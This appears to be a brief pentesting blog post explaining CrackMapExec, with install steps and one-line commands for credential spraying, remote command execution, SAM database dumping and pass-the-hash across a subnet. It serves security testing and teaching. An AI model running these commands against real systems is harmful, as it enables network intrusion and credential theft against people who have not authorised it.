Post Image


Going down the range.

So lets discuss a bit about Crack Map Execute.

The more targeted your user/pass or hash list - the more targeted your attack.
This tool is the go-to tool for internal engagements when performing large sweeps or 'Credential Spray' Attacks across a variety of protocols.

I encourage you to do some research on what protocols crackmapexec supports!

+ Here's where you're going to get it:

+ Python Package:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec

+ Install From Source:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive
cd CrackMapExec
poetry install
poetry run crackmapexec

--> Execute 'whoami'
crackmapexec -u Administrator -p 'PASS' -x whoami
-->Show Domain Administrators.
crackmapexec -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PS Version Table:
crackmapexec -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List out Machine Users.
crackmapexec -u 'Administrator' -p 'PASS' --lusers
--> Dump SAM Database.
crackmapexec -u 'Administrator' -p 'PASS' --local-auth --sam
--> Lets Pass The Hash against an entire subnet!
crackmapexec smb -u 'Administrator' -H 'LM:NTLM' --local-auth

Don't mind me - just pwning an entire network in one sweep...

Comments are closed.